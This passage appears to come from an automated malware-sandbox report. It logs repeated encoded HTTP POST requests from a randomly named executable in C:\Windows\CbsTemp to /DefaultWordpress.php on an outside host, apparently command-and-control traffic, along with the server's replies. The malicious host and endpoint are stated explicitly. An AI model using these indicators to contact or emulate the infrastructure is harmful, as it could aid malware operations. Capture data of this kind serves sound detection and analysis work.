                                                          Content-Length: 1948
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:08.306811094 CEST1948OUTData Raw: 5b 5a 5c 5f 5f 58 51 50 54 5b 52 57 50 53 57 5c 50 59 5d 5f 50 50 57 5e 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [Z\__XQPT[RWPSW\PY]_PPW^\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ )U%^2?#/^'+>(\)<(X&-'%!03X$X)+#F $P.
                                                          Oct 20, 2024 18:19:08.743805885 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:08.956645012 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:09.120368958 CEST938INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:09 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=59FF5DuH7uLYa%2BxznDdMw3uAzB321XHNg%2BeayvIV%2F87zObNApGlfxT52d0Xuptz3akLu%2FwcPzDlr8swySdC6F3YzugjJZJcQM03HzBD542CWJxZ7AgiBbT5pBJdW62MetA2C1wl2Gw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53eb1a772510-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=14135&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2259&delivery_rate=111918&cwnd=73&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 39 38 0d 0a 0d 10 25 03 33 01 01 1e 29 2f 28 57 2c 3e 3d 13 39 03 3c 02 2d 0f 25 5e 33 30 3a 58 31 5c 39 5c 25 30 3c 07 35 05 2a 5e 37 11 0f 54 39 36 28 5e 07 12 26 13 28 2f 33 05 2b 3d 3c 1b 3c 38 33 00 21 24 24 1c 32 03 27 53 25 3d 22 00 3d 1f 0c 01 29 2d 3d 09 39 1a 29 41 2e 3b 3f 01 20 00 22 53 03 13 25 1e 2a 0e 27 00 22 32 3c 06 3f 3d 27 5b 28 06 2a 1f 3e 30 37 5b 28 28 33 13 2d 3d 2e 10 24 06 3c 59 25 2c 23 05 32 04 2f 50 33 10 24 5e 2d 0e 2f 57 04 36 5b 4f 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 98%3)/(W,>=9<-%^30:X1\9\%0<5*^7T96(^&(/3+=<<83!$$2'S%="=)-=9)A.;? "S%*'"2<?='[(*>07[((3-=.$<Y%,#2/P3$^-/W6[O0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          60192.168.2.550039188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:08.256623030 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:08.603768110 CEST2528OUTData Raw: 5b 50 5c 58 5a 58 54 55 54 5b 52 57 50 53 57 5d 50 5c 5d 5f 50 57 57 5d 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [P\XZXTUT[RWPSW]P\]_PWW]\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ \)#.&]!+383)T=-?)/$,21<3.$->Y(:#F $P.
                                                          Oct 20, 2024 18:19:09.030966997 CEST25INHTTP/1.1 100 Continue


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          61192.168.2.550040188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:09.248241901 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:19:09.603818893 CEST2528OUTData Raw: 5b 59 5c 59 5a 5b 54 57 54 5b 52 57 50 59 57 5c 50 50 5d 56 50 5c 57 5b 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [Y\YZ[TWT[RWPYW\PP]VP\W[\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ ) .%%T>0(0^%=>7=<$.'X21X393%(*#F $P.(
                                                          Oct 20, 2024 18:19:10.041174889 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:10.296482086 CEST793INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:10 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4ArRUYKJP5WorRRI3ydAeWHvvBvIkhszC9yF%2FgwZKITX%2Bs4NTwpPakCO161R5l%2BtTwrpAd%2B%2FF%2BhiEHO2bRBoPLMcTXGJ2oT1tZRvcH1cozpomtkoufhCD94EymONtwYPV7mseZHqMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53f33fbb964a-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13059&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=100835&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          62192.168.2.550041188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:10.772001982 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:11.119282961 CEST2528OUTData Raw: 5b 5b 5c 59 5a 5b 54 50 54 5b 52 57 50 58 57 51 50 5a 5d 58 50 57 57 5f 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [[\YZ[TPT[RWPXWQPZ]XPWW_\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ Y>09X&;%(708V<\)$$?[%^'=0>_+#F $P.,
                                                          Oct 20, 2024 18:19:11.577857971 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:11.945928097 CEST794INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:11 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FEgJKctASNZPSsat8lihYx3eklz5E7Ak7cV51WQ9ETWFq76LYXmOid3ziMytnIlqCxGcIU53dUuWys%2F6rAg%2Bclufg2NQw%2BzhoEIv9OZARKqv%2FeOFA9PIh%2BEP5eij0d815ZREz1G3Ww%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53fcda4b67df-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13234&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=114015&cwnd=137&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          63192.168.2.550042188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:12.080239058 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:19:12.431759119 CEST2528OUTData Raw: 5b 5b 5c 5d 5f 58 51 55 54 5b 52 57 50 5d 57 56 50 5e 5d 56 50 57 57 5a 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [[\]_XQUT[RWP]WVP^]VPWWZ\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ >U&2;T> #08%V=>;> ]0#_1(3>%=6_+#F $P.
                                                          Oct 20, 2024 18:19:12.881131887 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:13.242223024 CEST785INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:13 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EPCT8JDb1TDXHSWPEG8AROHoRjshHUlo4uA6uNf65jcw4IgWeYdCLQDNzT0CrWw%2FgwFiEmH2woC9D73rD7o4tmxWIRQ0h0HqWL7jgAHhdWTdqx%2Fpd3fXyoeZxhYi6SNvq261J5zVAw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5404fb3a2536-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12985&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=111780&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:19:13.464538097 CEST785INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:13 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EPCT8JDb1TDXHSWPEG8AROHoRjshHUlo4uA6uNf65jcw4IgWeYdCLQDNzT0CrWw%2FgwFiEmH2woC9D73rD7o4tmxWIRQ0h0HqWL7jgAHhdWTdqx%2Fpd3fXyoeZxhYi6SNvq261J5zVAw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5404fb3a2536-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12985&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=111780&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          64192.168.2.550043188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:13.678982973 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:19:14.025645018 CEST2528OUTData Raw: 5e 5b 5c 5c 5a 5f 51 5d 54 5b 52 57 50 59 57 51 50 59 5d 5a 50 52 57 59 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^[\\Z_Q]T[RWPYWQPY]ZPRWY\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ \)3=_%8-U<0(3+%<-4>?;0=;_&1#'2$-5<*#F $P.(
                                                          Oct 20, 2024 18:19:14.972954035 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:15.483171940 CEST787INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:15 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=36XYuKsa86cy2Bn%2FEuSVbtp2s9fCbsp3YfUJb49s%2BCQDIw3drydGZK22kRKIPddIPbh%2FeMGcVwoedvlEwQMMimukqcVq8kM5AOvPR3gtkWa0EqYrJNMhDwb0X0o99m0jXJIBdAwJXA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a54120d422379-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13016&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=111625&cwnd=56&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          65192.168.2.550044188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:14.143486023 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 1948
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:14.494246006 CEST1948OUTData Raw: 5b 5a 59 58 5a 58 51 5c 54 5b 52 57 50 52 57 51 50 5b 5d 57 50 52 57 5f 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [ZYXZXQ\T[RWPRWQP[]WPRW_\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ X) .11<3&8)U<.8[(/($#[%/X$)'.>Y<:#F $P.
                                                          Oct 20, 2024 18:19:15.159230947 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:15.326036930 CEST944INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:15 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Hggbz6CYQZLKVKlp%2F11kQPiwZcWQHtL2VUi%2B2qIJgJ5S4b60am%2FlYzR%2Fy%2FVG3avrRH5jr2jPppbiFcZ%2FRuGlGveCidDakvjXyr23xWfVpNlVjuC%2F4ROHq4%2FoRLCDzZIG7awL8J7VQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5411d875fa4a-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=14153&sent=4&recv=6&lost=0&retrans=1&sent_bytes=50&recv_bytes=2259&delivery_rate=6257&cwnd=56&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 39 38 0d 0a 0d 10 25 03 33 3f 30 0f 3e 01 02 1d 2d 07 21 56 2e 3e 3b 5f 2e 31 36 04 27 30 39 01 25 14 00 02 25 55 2c 03 35 3c 35 03 34 2f 07 1f 39 0c 28 5e 07 12 26 5a 3c 5a 2c 5d 2a 2d 28 59 2b 38 20 5c 22 09 38 1c 31 3d 2f 53 25 3d 17 5f 29 32 3d 5d 29 3d 22 51 2d 0a 2d 41 39 06 0a 5d 23 00 22 53 03 13 26 01 29 23 3f 01 36 0c 16 02 3f 03 34 06 2b 5e 3a 5c 3d 0d 24 00 3c 28 09 5b 2c 2d 2e 5b 27 3c 37 01 26 01 05 01 31 14 01 17 27 2a 24 5e 2d 0e 2f 57 04 36 5b 4f 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 98%3?0>-!V.>;_.16'09%%U,5<54/9(^&Z<Z,]*-(Y+8 \"81=/S%=_)2=])="Q--A9]#"S&)#?6?4+^:\=$<([,-.['<7&1'*$^-/W6[O0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          66192.168.2.550045188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:15.617578983 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:19:15.977181911 CEST2528OUTData Raw: 5e 58 59 5e 5f 59 51 54 54 5b 52 57 50 5d 57 54 50 5b 5d 58 50 5d 57 5f 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^XY^_YQTT[RWP]WTP[]XP]W_\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ *%>< ''.(./(<$3=&1/['(.$5(#F $P.
                                                          Oct 20, 2024 18:19:16.402781010 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:16.772280931 CEST789INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:16 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZjqYhwuKQ%2BcOIePl8IZUxafyGwIxyDZoBdk%2Bd7wue0%2FYcAe0TgxBsBTXIurP33INzIENiy0C%2FRYFAD6xdVuHtXFQ8UR2JwcxYhYJ9taaq8mdUBab2ELZof0SkL7CvK0Fs7N6hq8qZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a541affc1cf72-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13036&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=112126&cwnd=46&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          67192.168.2.550046188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:17.095060110 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:17.447328091 CEST2528OUTData Raw: 5b 5c 5c 5e 5a 5b 51 5d 54 5b 52 57 50 5f 57 55 50 50 5d 5f 50 56 57 58 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [\\^Z[Q]T[RWP_WUPP]_PVWX\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ Y)-$+&(3;1U==$X)+0+Z%$00=*X(:#F $P.0
                                                          Oct 20, 2024 18:19:17.883897066 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:18.096468925 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:18.248212099 CEST791INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:18 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ACKmP1%2FU95eOkhRpAxh3fpjeAsNbi%2B2zCGwHvDgDZT11V6xqvxmyPiq0kmhphXlWwKj7fD7E1Ml3xN2326V%2FnuqEgGOSNYzSG0GGrjaow1iOClIPCsll%2FtbhQIn0TRJG%2FYWdzSW9PQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a54243e75ced9-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11262&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=127397&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          68192.168.2.550047188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:18.373370886 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:18.728669882 CEST2528OUTData Raw: 5b 58 5c 59 5a 5b 51 55 54 5b 52 57 50 59 57 56 50 59 5d 5e 50 5d 57 5d 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
